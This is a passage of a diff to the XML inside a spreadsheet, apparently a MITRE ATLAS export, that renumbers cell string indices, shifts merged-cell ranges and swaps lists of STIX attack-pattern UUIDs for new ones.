+        <v>339</v>
+      </c>
+      <c r="AA5" s="4" t="s">
+        <v>371</v>
+      </c>
+    </row>
+    <row r="6" spans="1:27">
+      <c r="A6" s="3" t="s">
+        <v>401</v>
       </c>
       <c r="C6" s="3" t="s">
-        <v>303</v>
+        <v>325</v>
       </c>
       <c r="D6" s="4" t="s">
-        <v>284</v>
+        <v>304</v>
       </c>
       <c r="E6" s="3" t="s">
-        <v>313</v>
+        <v>335</v>
       </c>
       <c r="H6" s="3" t="s">
-        <v>394</v>
+        <v>424</v>
       </c>
       <c r="I6" s="4" t="s">
-        <v>391</v>
+        <v>420</v>
       </c>
       <c r="J6" s="6"/>
       <c r="K6" s="4" t="s">
-        <v>360</v>
+        <v>386</v>
       </c>
       <c r="M6" s="6"/>
       <c r="N6" s="4" t="s">
-        <v>314</v>
+        <v>312</v>
       </c>
       <c r="P6" s="3" t="s">
-        <v>306</v>
-      </c>
-      <c r="R6" s="3" t="s">
-        <v>300</v>
-      </c>
-      <c r="T6" s="6"/>
-      <c r="U6" s="4" t="s">
-        <v>398</v>
-      </c>
-      <c r="W6" s="3" t="s">
-        <v>322</v>
-      </c>
-      <c r="Y6" s="3" t="s">
-        <v>319</v>
-      </c>
-    </row>
-    <row r="7" spans="1:26">
-      <c r="A7" s="6"/>
+        <v>328</v>
+      </c>
+      <c r="S6" s="3" t="s">
+        <v>321</v>
+      </c>
+      <c r="U6" s="6"/>
+      <c r="V6" s="4" t="s">
+        <v>428</v>
+      </c>
+      <c r="X6" s="3" t="s">
+        <v>344</v>
+      </c>
+      <c r="Z6" s="3" t="s">
+        <v>341</v>
+      </c>
+    </row>
+    <row r="7" spans="1:27">
+      <c r="A7" s="6" t="s">
+        <v>402</v>
+      </c>
       <c r="B7" s="4" t="s">
         <v>362</v>
       </c>
       <c r="C7" s="3" t="s">
-        <v>318</v>
+        <v>340</v>
       </c>
       <c r="E7" s="3" t="s">
-        <v>319</v>
+        <v>341</v>
       </c>
       <c r="J7" s="3" t="s">
-        <v>354</v>
-      </c>
-      <c r="M7" s="3" t="s">
-        <v>333</v>
+        <v>379</v>
+      </c>
+      <c r="M7" s="6"/>
+      <c r="N7" s="4" t="s">
+        <v>336</v>
       </c>
       <c r="P7" s="3" t="s">
-        <v>307</v>
-      </c>
-      <c r="T7" s="6" t="s">
-        <v>295</v>
-      </c>
-      <c r="U7" s="4" t="s">
-        <v>388</v>
-      </c>
-      <c r="W7" s="3" t="s">
-        <v>326</v>
-      </c>
-      <c r="Y7" s="6" t="s">
-        <v>324</v>
-      </c>
-      <c r="Z7" s="4" t="s">
-        <v>274</v>
-      </c>
-    </row>
-    <row r="8" spans="1:26">
+        <v>329</v>
+      </c>
+      <c r="U7" s="6" t="s">
+        <v>316</v>
+      </c>
+      <c r="V7" s="4" t="s">
+        <v>417</v>
+      </c>
+      <c r="X7" s="3" t="s">
+        <v>348</v>
+      </c>
+      <c r="Z7" s="6" t="s">
+        <v>346</v>
+      </c>
+      <c r="AA7" s="4" t="s">
+        <v>294</v>
+      </c>
+    </row>
+    <row r="8" spans="1:27">
       <c r="A8" s="6"/>
       <c r="B8" s="4" t="s">
-        <v>385</v>
+        <v>388</v>
       </c>
       <c r="C8" s="3" t="s">
-        <v>341</v>
+        <v>365</v>
       </c>
       <c r="E8" s="3" t="s">
-        <v>323</v>
+        <v>345</v>
       </c>
       <c r="J8" s="3" t="s">
-        <v>361</v>
+        <v>387</v>
       </c>
       <c r="M8" s="3" t="s">
-        <v>340</v>
+        <v>357</v>
       </c>
       <c r="P8" s="3" t="s">
-        <v>308</v>
-      </c>
-      <c r="T8" s="6"/>
-      <c r="U8" s="4" t="s">
-        <v>389</v>
-      </c>
-      <c r="W8" s="3" t="s">
-        <v>339</v>
-      </c>
-      <c r="Y8" s="6"/>
-      <c r="Z8" s="4" t="s">
-        <v>328</v>
-      </c>
-    </row>
-    <row r="9" spans="1:26">
-      <c r="A9" s="3" t="s">
-        <v>375</v>
+        <v>330</v>
+      </c>
+      <c r="U8" s="6"/>
+      <c r="V8" s="4" t="s">
+        <v>418</v>
+      </c>
+      <c r="X8" s="3" t="s">
+        <v>363</v>
+      </c>
+      <c r="Z8" s="6"/>
+      <c r="AA8" s="4" t="s">
+        <v>350</v>
+      </c>
+    </row>
+    <row r="9" spans="1:27">
+      <c r="A9" s="6"/>
+      <c r="B9" s="4" t="s">
+        <v>414</v>
       </c>
       <c r="C9" s="6" t="s">
-        <v>356</v>
+        <v>382</v>
       </c>
       <c r="D9" s="4" t="s">
-        <v>283</v>
+        <v>303</v>
       </c>
       <c r="E9" s="3" t="s">
-        <v>357</v>
+        <v>383</v>
       </c>
       <c r="F9" s="4" t="s">
-        <v>380</v>
+        <v>409</v>
       </c>
       <c r="J9" s="3" t="s">
-        <v>368</v>
+        <v>390</v>
       </c>
       <c r="M9" s="3" t="s">
-        <v>343</v>
+        <v>364</v>
       </c>
       <c r="P9" s="3" t="s">
-        <v>309</v>
+        <v>331</v>
       </c>
       <c r="Q9" s="4" t="s">
-        <v>331</v>
-      </c>
-      <c r="T9" s="6"/>
-      <c r="U9" s="4" t="s">
-        <v>393</v>
-      </c>
-      <c r="W9" s="3" t="s">
-        <v>345</v>
-      </c>
-      <c r="X9" s="4" t="s">
-        <v>376</v>
-      </c>
-      <c r="Y9" s="6"/>
-      <c r="Z9" s="4" t="s">
+        <v>355</v>
+      </c>
+      <c r="U9" s="6"/>
+      <c r="V9" s="4" t="s">
+        <v>423</v>
+      </c>
+      <c r="X9" s="3" t="s">
         <v>369</v>
       </c>
-    </row>
-    <row r="10" spans="1:26">
+      <c r="Y9" s="4" t="s">
+        <v>405</v>
+      </c>
+      <c r="Z9" s="6"/>
+      <c r="AA9" s="4" t="s">
+        <v>397</v>
+      </c>
+    </row>
+    <row r="10" spans="1:27">
+      <c r="A10" s="3" t="s">
+        <v>403</v>
+      </c>
       <c r="C10" s="6"/>
       <c r="D10" s="4" t="s">
-        <v>378</v>
+        <v>407</v>
       </c>
       <c r="E10" s="3" t="s">
+        <v>390</v>
+      </c>
+      <c r="J10" s="3" t="s">
         <v>396</v>
       </c>
       <c r="M10" s="3" t="s">
-        <v>346</v>
+        <v>367</v>
       </c>
       <c r="P10" s="6" t="s">
-        <v>310</v>
+        <v>332</v>
       </c>
       <c r="Q10" s="4" t="s">
-        <v>312</v>
-      </c>
-      <c r="T10" s="6" t="s">
-        <v>348</v>
-      </c>
-      <c r="U10" s="4" t="s">
-        <v>355</v>
-      </c>
-      <c r="Y10" s="6"/>
-      <c r="Z10" s="4" t="s">
-        <v>377</v>
-      </c>
-    </row>
-    <row r="11" spans="1:26">
+        <v>334</v>
+      </c>
+      <c r="U10" s="3" t="s">
+        <v>354</v>
+      </c>
+      <c r="Z10" s="6"/>
+      <c r="AA10" s="4" t="s">
+        <v>406</v>
+      </c>
+    </row>
+    <row r="11" spans="1:27">
+      <c r="A11" s="3" t="s">
+        <v>404</v>
+      </c>
       <c r="C11" s="3" t="s">
-        <v>361</v>
+        <v>387</v>
+      </c>
+      <c r="E11" s="3" t="s">
+        <v>426</v>
       </c>
       <c r="M11" s="3" t="s">
-        <v>350</v>
+        <v>370</v>
       </c>
       <c r="P11" s="6"/>
       <c r="Q11" s="4" t="s">
-        <v>358</v>
-      </c>
-      <c r="T11" s="6"/>
-      <c r="U11" s="4" t="s">
-        <v>360</v>
-      </c>
-      <c r="Y11" s="6"/>
-      <c r="Z11" s="4" t="s">
-        <v>395</v>
-      </c>
-    </row>
-    <row r="12" spans="1:26">
+        <v>384</v>
+      </c>
+      <c r="U11" s="6" t="s">
+        <v>372</v>
+      </c>
+      <c r="V11" s="4" t="s">
+        <v>380</v>
+      </c>
+      <c r="Z11" s="6"/>
+      <c r="AA11" s="4" t="s">
+        <v>425</v>
+      </c>
+    </row>
+    <row r="12" spans="1:27">
       <c r="C12" s="3" t="s">
-        <v>363</v>
+        <v>391</v>
+      </c>
+      <c r="M12" s="3" t="s">
+        <v>373</v>
+      </c>
+      <c r="N12" s="4" t="s">
+        <v>305</v>
       </c>
       <c r="P12" s="6" t="s">
-        <v>311</v>
+        <v>333</v>
       </c>
       <c r="Q12" s="4" t="s">
-        <v>381</v>
-      </c>
-      <c r="T12" s="3" t="s">
-        <v>397</v>
-      </c>
-      <c r="Y12" s="3" t="s">
-        <v>379</v>
-      </c>
-    </row>
-    <row r="13" spans="1:26">
+        <v>410</v>
+      </c>
+      <c r="U12" s="6"/>
+      <c r="V12" s="4" t="s">
+        <v>386</v>
+      </c>
+      <c r="Z12" s="3" t="s">
+        <v>408</v>
+      </c>
+    </row>
+    <row r="13" spans="1:27">
       <c r="C13" s="3" t="s">
-        <v>364</v>
+        <v>392</v>
+      </c>
+      <c r="M13" s="3" t="s">
+        <v>375</v>
       </c>
       <c r="P13" s="6"/>
       <c r="Q13" s="4" t="s">
-        <v>383</v>
-      </c>
-    </row>
-    <row r="14" spans="1:26">
+        <v>412</v>
+      </c>
+      <c r="U13" s="3" t="s">
+        <v>427</v>
+      </c>
+    </row>
+    <row r="14" spans="1:27">
       <c r="C14" s="3" t="s">
-        <v>365</v>
+        <v>393</v>
       </c>
       <c r="P14" s="6"/>
       <c r="Q14" s="4" t="s">
-        <v>384</v>
-      </c>
-    </row>
-    <row r="15" spans="1:26">
+        <v>413</v>
+      </c>
+    </row>
+    <row r="15" spans="1:27">
       <c r="C15" s="3" t="s">
-        <v>370</v>
-      </c>
-    </row>
-    <row r="16" spans="1:26">
+        <v>398</v>
+      </c>
+      <c r="P15" s="3" t="s">
+        <v>389</v>
+      </c>
+    </row>
+    <row r="16" spans="1:27">
       <c r="C16" s="3" t="s">
-        <v>382</v>
+        <v>411</v>
       </c>
     </row>
   </sheetData>
   <mergeCells count="29">
-    <mergeCell ref="A6:A8"/>
+    <mergeCell ref="A7:A9"/>
     <mergeCell ref="A1:B1"/>
     <mergeCell ref="C2:C3"/>
     <mergeCell ref="C4:C5"/>
@@ -8982,22 +9764,22 @@
     <mergeCell ref="J2:J3"/>
     <mergeCell ref="J5:J6"/>
     <mergeCell ref="J1:K1"/>
-    <mergeCell ref="M4:M6"/>
+    <mergeCell ref="M5:M7"/>
     <mergeCell ref="M1:N1"/>
     <mergeCell ref="P3:P5"/>
     <mergeCell ref="P10:P11"/>
     <mergeCell ref="P12:P14"/>
     <mergeCell ref="P1:Q1"/>
-    <mergeCell ref="R3:R4"/>
-    <mergeCell ref="R1:S1"/>
-    <mergeCell ref="T2:T6"/>
-    <mergeCell ref="T7:T9"/>
-    <mergeCell ref="T10:T11"/>
-    <mergeCell ref="T1:U1"/>
-    <mergeCell ref="W3:W5"/>
-    <mergeCell ref="W1:X1"/>
-    <mergeCell ref="Y7:Y11"/>
-    <mergeCell ref="Y1:Z1"/>
+    <mergeCell ref="S3:S4"/>
+    <mergeCell ref="S1:T1"/>
+    <mergeCell ref="U2:U6"/>
+    <mergeCell ref="U7:U9"/>
+    <mergeCell ref="U11:U12"/>
+    <mergeCell ref="U1:V1"/>
+    <mergeCell ref="X3:X5"/>
+    <mergeCell ref="X1:Y1"/>
+    <mergeCell ref="Z7:Z11"/>
+    <mergeCell ref="Z1:AA1"/>
   </mergeCells>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>

--- a/excel-files/atlas.xlsx
+++ b/excel-files/atlas.xlsx
@@ -17,7 +17,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1814" uniqueCount="958">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1814" uniqueCount="986">
   <si>
     <t>ID</t>
   </si>
@@ -466,424 +466,424 @@
     <t>AML.T0043.000</t>
   </si>
   <si>
-    <t>attack-pattern--12edcfea-e809-45ab-ba68-a678b828dc0e</t>
-  </si>
-  <si>
-    <t>attack-pattern--4a4c006f-9edb-4161-af0c-31ae36cfeb6e</t>
-  </si>
-  <si>
-    <t>attack-pattern--cb2ad666-315c-49e8-87f9-978ffcb1c696</t>
-  </si>
-  <si>
-    <t>attack-pattern--2a2d2e69-55da-4212-809a-eb6ecde65f70</t>
-  </si>
-  <si>
-    <t>attack-pattern--408d1e30-4fd6-41f1-bc48-cf575e74b18a</t>
-  </si>
-  <si>
-    <t>attack-pattern--30f1f6a3-f227-4293-a102-c4be62566f42</t>
-  </si>
-  <si>
-    <t>attack-pattern--8755a1fb-e2df-4538-bcf3-9d37d31cf0e5</t>
-  </si>
-  <si>
-    <t>attack-pattern--eaec44e1-048d-487a-8774-da706f6744d6</t>
-  </si>
-  <si>
-    <t>attack-pattern--0a4c52dc-1241-4d85-88af-e77919000c98</t>
-  </si>
-  <si>
-    <t>attack-pattern--78121d5a-c458-40dc-a83a-3e5771d5f966</t>
-  </si>
-  <si>
-    <t>attack-pattern--ca18d6e9-9302-4411-afdc-6bbdd227cf34</t>
-  </si>
-  <si>
-    <t>attack-pattern--74b811fa-679a-4af8-90c0-0d8e29d59e16</t>
-  </si>
-  <si>
-    <t>attack-pattern--9c0e3816-6af3-4831-a6cb-063ecd8912bc</t>
-  </si>
-  <si>
-    <t>attack-pattern--0f69567a-b943-4d73-b8a8-eb353966a75c</t>
-  </si>
-  <si>
-    <t>attack-pattern--4df36b1a-0187-4166-9409-ff7c786e5aa8</t>
-  </si>
-  <si>
-    <t>attack-pattern--c23ca372-b331-4f75-9837-5009f44cd238</t>
-  </si>
-  <si>
-    <t>attack-pattern--3c8879fd-fbe4-4a4e-b696-9941719a0ac1</t>
-  </si>
-  <si>
-    <t>attack-pattern--f8f6de56-8b84-4883-99d2-a6ab686ff802</t>
-  </si>
-  <si>
-    <t>attack-pattern--7efea7f3-c603-4d10-b1f1-6376873f9c71</t>
-  </si>
-  <si>
-    <t>attack-pattern--60ce2322-135c-4492-9e39-5061eae8f6a7</t>
-  </si>
-  <si>
-    <t>attack-pattern--afb92d07-5db6-4a84-b473-cd12bb99f229</t>
-  </si>
-  <si>
-    <t>attack-pattern--9d44d423-99ca-49ad-b5d4-7b3fa368b7ad</t>
-  </si>
-  <si>
-    <t>attack-pattern--53ea9b24-4814-44c0-ac51-993e102f06ed</t>
-  </si>
-  <si>
-    <t>attack-pattern--ea30ad28-4b01-4236-a447-28116c9a4805</t>
-  </si>
-  <si>
-    <t>attack-pattern--a40bd74f-f2de-4f60-bd0c-f2a1f0a56718</t>
-  </si>
-  <si>
-    <t>attack-pattern--6171704b-8ace-4d2e-8727-a4f0c5ca7b4a</t>
-  </si>
-  <si>
-    <t>attack-pattern--2bc121ad-7ab0-4630-a5e9-d5a7922fa8dd</t>
-  </si>
-  <si>
-    <t>attack-pattern--da3da4d4-a261-4dd0-9d4c-36bd43e886b4</t>
-  </si>
-  <si>
-    <t>attack-pattern--2dd0f878-83b0-4c24-8e7f-a598db0c379d</t>
-  </si>
-  <si>
-    <t>attack-pattern--948dd102-ecc7-4cf3-8331-e1e5abd54a66</t>
-  </si>
-  <si>
-    <t>attack-pattern--835d9bc1-2389-44e0-b4dd-87d11692833a</t>
-  </si>
-  <si>
-    <t>attack-pattern--79594ffe-7578-4fb5-864c-cb0bb3e13bcc</t>
-  </si>
-  <si>
-    <t>attack-pattern--9ab48298-95df-4d38-bb17-5bc134f83210</t>
-  </si>
-  <si>
-    <t>attack-pattern--7847b0ce-4e31-450c-b2f5-fe5d34d6ede4</t>
-  </si>
-  <si>
-    <t>attack-pattern--0b61d089-92cc-421d-a5e9-8ee7f290c0a6</t>
-  </si>
-  <si>
-    <t>attack-pattern--ac97befe-574d-4624-9615-6ec5f3c15d7e</t>
-  </si>
-  <si>
-    <t>attack-pattern--1ad2142f-bd6b-4c39-904d-4b6e00c48a44</t>
-  </si>
-  <si>
-    <t>attack-pattern--568bdae0-9c1e-4f17-9ad8-b1284fc343c2</t>
-  </si>
-  <si>
-    <t>attack-pattern--b2708d3b-cfc7-4d43-877a-c1c89246c379</t>
-  </si>
-  <si>
-    <t>attack-pattern--4187ee08-0ae4-4b24-b648-c7e85c8805e0</t>
-  </si>
-  <si>
-    <t>attack-pattern--753e6d26-e7b3-441b-909a-455119166eb1</t>
-  </si>
-  <si>
-    <t>attack-pattern--242cd62a-715a-4482-b2fb-b628dd6c2bd2</t>
-  </si>
-  <si>
-    <t>attack-pattern--123e4b64-f2ef-4eab-a979-ceba2901ac85</t>
-  </si>
-  <si>
-    <t>attack-pattern--0c6a1b8e-9650-41a2-a58a-7628bf998fc6</t>
-  </si>
-  <si>
-    <t>attack-pattern--3518855d-8b96-4805-ba45-713e2cefbf82</t>
-  </si>
-  <si>
-    <t>attack-pattern--d62c9a46-a6a3-42f9-a200-28a2b6626b34</t>
-  </si>
-  <si>
-    <t>attack-pattern--68ac114f-e054-474a-994a-30396929438e</t>
-  </si>
-  <si>
-    <t>attack-pattern--ef912563-cd9f-4416-85aa-0af1e77defc8</t>
-  </si>
-  <si>
-    <t>attack-pattern--aa93940d-aa5c-4b25-80a0-4c2d6dac873a</t>
-  </si>
-  <si>
-    <t>attack-pattern--2b11c16e-6de1-4308-941d-503450611f29</t>
-  </si>
-  <si>
-    <t>attack-pattern--0c9f47cf-1b80-4e03-88b9-c1f496c1703d</t>
-  </si>
-  <si>
-    <t>attack-pattern--e3c492a9-d5ee-49e7-be6b-8475b0a6bfc2</t>
-  </si>
-  <si>
-    <t>attack-pattern--65a96a5b-97fc-4c2a-b28d-ec431a7d6b16</t>
-  </si>
-  <si>
-    <t>attack-pattern--ba0780ed-8721-4ed2-af10-7957816a2706</t>
-  </si>
-  <si>
-    <t>attack-pattern--723710a2-5947-4211-a050-f79b4dc76144</t>
-  </si>
-  <si>
-    <t>attack-pattern--c3f4ed27-3927-4af1-a9d0-a9f5a62e1b28</t>
-  </si>
-  <si>
-    <t>attack-pattern--6fbe5472-f514-4ea3-aaa3-bfeef28d4d3f</t>
-  </si>
-  <si>
-    <t>attack-pattern--d58b4f91-5abd-47fa-986e-28e0c4b840a8</t>
-  </si>
-  <si>
-    <t>attack-pattern--b882dc78-920e-4241-bf44-fdc95d1ab009</t>
-  </si>
-  <si>
-    <t>attack-pattern--14644c46-5768-4f18-a42d-2975aa3439bd</t>
-  </si>
-  <si>
-    <t>attack-pattern--cddeee77-314c-482e-a23e-2328875d8006</t>
-  </si>
-  <si>
-    <t>attack-pattern--c97f5a0b-afd7-48b8-a59d-f20879395fd3</t>
-  </si>
-  <si>
-    <t>attack-pattern--94e4d142-dd64-464a-9675-e8a14aca8261</t>
-  </si>
-  <si>
-    <t>attack-pattern--ff58975a-c95b-4a27-b476-5eb4e3eae306</t>
-  </si>
-  <si>
-    <t>attack-pattern--6ff43c1d-364e-4474-b24a-72173b77b973</t>
-  </si>
-  <si>
-    <t>attack-pattern--061a4089-aa9c-4ad7-a3a2-1ff01434efae</t>
-  </si>
-  <si>
-    <t>attack-pattern--56185ba0-9145-4f93-829c-3911e6624ed5</t>
-  </si>
-  <si>
-    <t>attack-pattern--8a477141-c62d-4b00-ae3d-25a1d4bb3ae4</t>
-  </si>
-  <si>
-    <t>attack-pattern--0b027ade-8ede-4ff1-a239-f3437ef0f475</t>
-  </si>
-  <si>
-    <t>attack-pattern--9a402de5-aa40-41f2-8e36-38e41ae962f7</t>
-  </si>
-  <si>
-    <t>attack-pattern--3ec5213b-94f3-4a03-a127-c7988dbf24d9</t>
-  </si>
-  <si>
-    <t>attack-pattern--874de68e-9842-48e2-b04e-a08ffaeb19e5</t>
-  </si>
-  <si>
-    <t>attack-pattern--d4a80308-c6c1-487b-92f2-ca23374b0fad</t>
-  </si>
-  <si>
-    <t>attack-pattern--8a62c6fa-c1d7-42b7-841d-fc6e0153f176</t>
-  </si>
-  <si>
-    <t>attack-pattern--e19b38ca-6197-43d5-999f-6dd8bf79bf43</t>
-  </si>
-  <si>
-    <t>attack-pattern--15c00b06-ace3-46c1-9f37-5c882becfba3</t>
-  </si>
-  <si>
-    <t>attack-pattern--f378935a-cb5e-446f-97bf-e72fb430f20b</t>
-  </si>
-  <si>
-    <t>attack-pattern--f34e16c9-f3a3-4895-91e1-c1349ac2424f</t>
-  </si>
-  <si>
-    <t>attack-pattern--f9e6bd5d-62e4-4a85-aaf0-529d84b8a786</t>
-  </si>
-  <si>
-    <t>attack-pattern--9f78285d-9218-4d6f-8d64-7de7e1e37261</t>
-  </si>
-  <si>
-    <t>attack-pattern--054692af-eb4d-4714-86f1-c65caab22dff</t>
-  </si>
-  <si>
-    <t>attack-pattern--34f70869-9d80-4452-97e0-16399eb91e2f</t>
-  </si>
-  <si>
-    <t>attack-pattern--57ded1f2-2297-49c9-8e47-7db29fe7e96e</t>
-  </si>
-  <si>
-    <t>attack-pattern--b57c67d7-1442-485e-a60c-6581b7911930</t>
-  </si>
-  <si>
-    <t>attack-pattern--adc5e672-a927-40cc-b8c8-d955eadca06c</t>
-  </si>
-  <si>
-    <t>attack-pattern--c32157ce-b6f1-458c-8d0d-a37a228f4ff3</t>
-  </si>
-  <si>
-    <t>attack-pattern--d5b75e5e-5296-41d7-bc72-2e5aa7c9918d</t>
-  </si>
-  <si>
-    <t>attack-pattern--b252a691-ee08-4ae8-981b-b3f004a32ee9</t>
-  </si>
-  <si>
-    <t>attack-pattern--68bda813-33bf-4843-9964-5c446c22c01e</t>
-  </si>
-  <si>
-    <t>attack-pattern--c9746330-554c-4359-86a1-f3553102e56a</t>
-  </si>
-  <si>
-    <t>attack-pattern--5fc7dfad-48b9-49ce-bd65-0964f80126bf</t>
-  </si>
-  <si>
-    <t>attack-pattern--4698eee5-b315-4030-be87-55ccb3e4de06</t>
-  </si>
-  <si>
-    <t>attack-pattern--f9efc079-fd9e-4bdb-854f-0ea194521a68</t>
-  </si>
-  <si>
-    <t>attack-pattern--dfee8878-6148-49f2-84ce-80464f0e0682</t>
-  </si>
-  <si>
-    <t>attack-pattern--05249f4a-67bd-4abe-8b62-4f8e487ad6b7</t>
-  </si>
-  <si>
-    <t>attack-pattern--70d17d9f-0b95-4cc5-8c09-e000bd4486b0</t>
-  </si>
-  <si>
-    <t>attack-pattern--18b30bd8-ffa5-41ac-aa92-eead8ee22ae5</t>
-  </si>
-  <si>
-    <t>attack-pattern--a5363aa6-628f-4326-a180-6390bc609aec</t>
-  </si>
-  <si>
-    <t>attack-pattern--c357897c-662c-4a41-883d-98bfb369ab30</t>
-  </si>
-  <si>
-    <t>attack-pattern--f6f8e972-cde7-4094-b68a-75ce413415f3</t>
-  </si>
-  <si>
-    <t>attack-pattern--5e497eda-25f7-4f68-8bb4-89cb98cb5295</t>
-  </si>
-  <si>
-    <t>attack-pattern--4e0dd341-d2b5-4740-bc74-3c6b69e75b6c</t>
-  </si>
-  <si>
-    <t>attack-pattern--9bf37423-9b1a-4cdf-8588-cc146c94c21f</t>
-  </si>
-  <si>
-    <t>attack-pattern--b0dbc5d2-4207-445a-9b08-6df360948fb1</t>
-  </si>
-  <si>
-    <t>attack-pattern--6b9f7277-4207-4fa7-a8af-946715cade74</t>
-  </si>
-  <si>
-    <t>attack-pattern--52283b39-3b57-4a79-afee-761cee49a4e8</t>
-  </si>
-  <si>
-    <t>attack-pattern--9b153778-a791-4e7d-b498-fd962a77624b</t>
-  </si>
-  <si>
-    <t>attack-pattern--4d2d534b-473d-4983-a049-52052d1f5456</t>
-  </si>
-  <si>
-    <t>attack-pattern--18768c89-a7c5-410a-95e8-dec77edf9594</t>
-  </si>
-  <si>
-    <t>attack-pattern--ee282f59-bf8d-474b-aa9e-e7ac1e1c5a07</t>
-  </si>
-  <si>
-    <t>attack-pattern--4f89acd9-606f-48a6-b041-24068d04b818</t>
-  </si>
-  <si>
-    <t>attack-pattern--1d35b531-4802-4a44-8897-47fbff98f4dc</t>
-  </si>
-  <si>
-    <t>attack-pattern--ea6875ba-3f47-4636-b80f-3964e3faf6d9</t>
-  </si>
-  <si>
-    <t>attack-pattern--87b94e0e-5d5d-438e-9603-083b2196e765</t>
-  </si>
-  <si>
-    <t>attack-pattern--03f3b5b6-ec07-4b6c-bbe3-ba0318933a36</t>
-  </si>
-  <si>
-    <t>attack-pattern--fffa50b1-9bdb-4188-8734-10567904c15f</t>
-  </si>
-  <si>
-    <t>attack-pattern--e83e410b-cbeb-4e5a-a266-2cf46d850b1a</t>
-  </si>
-  <si>
-    <t>attack-pattern--56913fa2-ea59-487a-ac16-0d432eb8e808</t>
-  </si>
-  <si>
-    <t>attack-pattern--c66281c8-1b88-41a5-95db-50e2fbf84fa1</t>
-  </si>
-  <si>
-    <t>attack-pattern--bb56158c-34a8-4eb6-947e-d6831babd031</t>
-  </si>
-  <si>
-    <t>attack-pattern--2ae49cee-9d83-4ef1-a3d3-107ee6b92241</t>
-  </si>
-  <si>
-    <t>attack-pattern--f5a4aa73-a4d1-4e2b-9af2-c7448df56b02</t>
-  </si>
-  <si>
-    <t>attack-pattern--3cb8a337-5f3d-4b1f-a6ca-a7ee3378d5e0</t>
-  </si>
-  <si>
-    <t>attack-pattern--8fa43514-e02a-4034-80f8-ab5052a5d812</t>
-  </si>
-  <si>
-    <t>attack-pattern--8831f04e-93f9-4836-b138-586e566ddf20</t>
-  </si>
-  <si>
-    <t>attack-pattern--aad94e82-da34-4951-ae68-ba33107dbca0</t>
-  </si>
-  <si>
-    <t>attack-pattern--67558c56-9a0c-4b36-803b-2b7e0b4f9a5c</t>
-  </si>
-  <si>
-    <t>attack-pattern--1914f33c-3e1d-4a33-985d-1490cd6fb0a4</t>
-  </si>
-  <si>
-    <t>attack-pattern--8efa02a7-b199-447e-b66a-094d1db6031c</t>
-  </si>
-  <si>
-    <t>attack-pattern--f3ca37b5-5658-4026-b992-e2bf9aa6edcb</t>
-  </si>
-  <si>
-    <t>attack-pattern--df6768d8-1950-434b-9957-029b0d6bf560</t>
-  </si>
-  <si>
-    <t>attack-pattern--eb12109e-5540-4de8-a3f2-0a3b85ebaf98</t>
-  </si>
-  <si>
-    <t>attack-pattern--3c5ee2f3-c1c8-4638-9d6f-b5d2c7ee6467</t>
-  </si>
-  <si>
-    <t>attack-pattern--b75ad076-327e-499a-8e10-981f437e9092</t>
-  </si>
-  <si>
-    <t>attack-pattern--ef77e901-4146-426c-9927-fb7a445716b5</t>
-  </si>
-  <si>
-    <t>attack-pattern--392a08c5-1a22-45b3-b85d-28011da21a0c</t>
-  </si>
-  <si>
-    <t>attack-pattern--f6171db5-f5e6-48a3-8f39-4bc7ba6413ae</t>
-  </si>
-  <si>
-    <t>attack-pattern--137e8bec-8054-4be1-b5d1-3f4e8f67b9d5</t>
-  </si>
-  <si>
-    <t>attack-pattern--48ad4cfc-a8b6-4837-aa34-30a0f4026f2c</t>
-  </si>
-  <si>
-    <t>attack-pattern--f57d4d58-f1ca-4924-becc-730e186ca0fd</t>
+    <t>attack-pattern--785ca1b4-7d17-51f1-a605-46a9f21fb9b0</t>
+  </si>
+  <si>
+    <t>attack-pattern--b23b5475-a05e-5b4a-8e9f-8c758dd0cda8</t>
+  </si>
+  <si>
+    <t>attack-pattern--bfa79523-214f-57f5-a445-c8a563f141f5</t>
+  </si>
+  <si>
+    <t>attack-pattern--801658f2-81cd-5935-93c7-5e6e2d80e669</t>
+  </si>
+  <si>
+    <t>attack-pattern--b14fb0a1-a329-5982-a44c-c5da0b458d39</t>
+  </si>
+  <si>
+    <t>attack-pattern--73772ced-edba-578c-bacd-703e082a9c57</t>
+  </si>
+  <si>
+    <t>attack-pattern--5ac1f849-523e-51bf-a1e9-1a97ab91cc91</t>
+  </si>
+  <si>
+    <t>attack-pattern--3bf297c5-2ab2-573a-aa4e-f20af3d2643c</t>
+  </si>
+  <si>
+    <t>attack-pattern--2ea180c5-5df4-5815-8c78-a1cec1da6e18</t>
+  </si>
+  <si>
+    <t>attack-pattern--a18245d0-2fb1-5f72-a069-5c176a0a11df</t>
+  </si>
+  <si>
+    <t>attack-pattern--159106db-413f-5f36-854f-09729ed0a18f</t>
+  </si>
+  <si>
+    <t>attack-pattern--a8393765-c78b-5bd3-8f92-74579e8f5a9f</t>
+  </si>
+  <si>
+    <t>attack-pattern--9b9a3289-1c15-5719-9501-707bac954fee</t>
+  </si>
+  <si>
+    <t>attack-pattern--cbebfc30-9124-5c7e-915c-d4af59ddb34e</t>
+  </si>
+  <si>
+    <t>attack-pattern--e249e479-eb89-5082-a51e-e862d705ec1d</t>
+  </si>
+  <si>
+    <t>attack-pattern--80a54397-082c-5d02-9d2e-1d30d7375c75</t>
+  </si>
+  <si>
+    <t>attack-pattern--7c36d546-bb69-5a52-a1ac-6d52cb10fc48</t>
+  </si>
+  <si>
+    <t>attack-pattern--cf1f989f-9b4e-5dae-aaf8-719e71b2fb8b</t>
+  </si>
+  <si>
+    <t>attack-pattern--079c33e1-722c-58ad-983d-1bcd94a35c7b</t>
+  </si>
+  <si>
+    <t>attack-pattern--c89e98ce-f3a5-5351-9d5a-f2d8fd59ba5f</t>
+  </si>
+  <si>
+    <t>attack-pattern--59fc3797-1686-503b-9212-26e1eecb5a69</t>
+  </si>
+  <si>
+    <t>attack-pattern--07421f1a-a5ae-5936-9713-c77e4758177c</t>
+  </si>
+  <si>
+    <t>attack-pattern--2bc7b6ec-2304-5913-8b0c-bb92ba135724</t>
+  </si>
+  <si>
+    <t>attack-pattern--757f3580-72e6-514d-9770-af3ee98a1a0b</t>
+  </si>
+  <si>
+    <t>attack-pattern--50640a13-8791-5642-bbe7-c199c93d1b45</t>
+  </si>
+  <si>
+    <t>attack-pattern--7bbac64e-2b1d-5cb0-a442-bb7573b0a328</t>
+  </si>
+  <si>
+    <t>attack-pattern--c9122fef-2e35-5d75-9e0a-6ae552ee208f</t>
+  </si>
+  <si>
